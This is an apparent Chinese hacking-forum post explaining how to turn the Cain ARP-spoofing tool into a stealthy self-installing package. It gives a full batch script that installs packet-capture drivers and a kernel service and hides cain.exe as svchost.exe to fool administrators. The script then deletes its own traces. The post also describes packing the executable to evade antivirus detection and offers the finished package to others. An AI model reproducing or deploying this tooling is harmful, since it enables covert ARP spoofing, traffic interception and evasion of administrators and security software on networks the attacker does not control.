[讨论]绿色cain制作过程 比较完美的方法了 cain, 绿色, 制作, 讨论

MAYA

[讨论]绿色cain制作过程 比较完美的方法了
议题作者：l4dron（http://www.myspace.cn/hack）
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

经过测试后，大家可以发现，ca_setup.exe这个文件安装后，如果只是执行arp欺骗工作的话，只要cain.exe这个文件就可以了，其他的安装文件可以全部不要（所需的驱动文件除外）。

首先自己安装下cain，默认安装就可以。然后把cain.exe复制出来，加花处理下，主要是针对4.97这个版本被挪吨这个杀毒软件杀掉的问题。

然后提取出下列文件：

system32\drivers\npf.sys
system32\packet.dll
system32\wpcap.dll
system32\wanpacket.dll

放在刚才复制出来那个cain.exe的同一目录里，再写一个bat文件，当然，vbs文件也可以，我写的是bat文件。bat文件内容如下：

@echo off
copy packet.dll %SYSTEMROOT%\system32\packet.dll
copy wpcap.dll %SYSTEMROOT%\system32\wpcap.dll
copy wanpacket.dll %SYSTEMROOT%\system32\wanpacket.dll
copy npf.sys %SYSTEMROOT%\system32\drivers\npf.sys
copy cain.exe %SYSTEMROOT%\system32\ras\svchost.exe
sc create npf binpath= system32\drivers\npf.sys type= kernel start= demand
del packet.dll
del wpcap.dll
del wanpacket.dll
del npf.sys
del cain.exe
del l4.exe
del l4.bat


保存好后制作一个自解压文件，制作过程很简单，要求是解压后就运行刚才建立的l4.bat，自解压文件命名为l4.exe，在解压路径为当前目录创建，模式为全部隐藏和覆盖所有文件，文本和图标那里可以自己选一个ico文件，好了，这就算制作完毕。

我测试过，cain这个arpsniffe工具，只有cain.exe这个主文件就可以照常运行arp攻击。

现在，这个cain.exe为免杀，绿色，自动安装所需的驱动，体积仅为1.15mb。点击l4.exe后自动释放cain.exe到system32\ras\目录下并该名为svchost.exe（这样在任务管理器里管理员看到的还是svchost.exe，可以小欺骗下管理员）。运行cain.exe的时候，会弹出来个框，问你确实要运行这个工具么，点是就可以了。0k，现在可以尽情的arp欺骗了。

实在不想自己diy的，加我QQ，我pub给你。myspace.cn/hack


帖子7 精华0 积分27 阅读权限40 性别男 在线时间20 小时 注册时间2007-6-27 最后登录2008-6-13 查看详细资料TOP 爱要怎么说出口

7个b
晶莹剔透§烈日灼然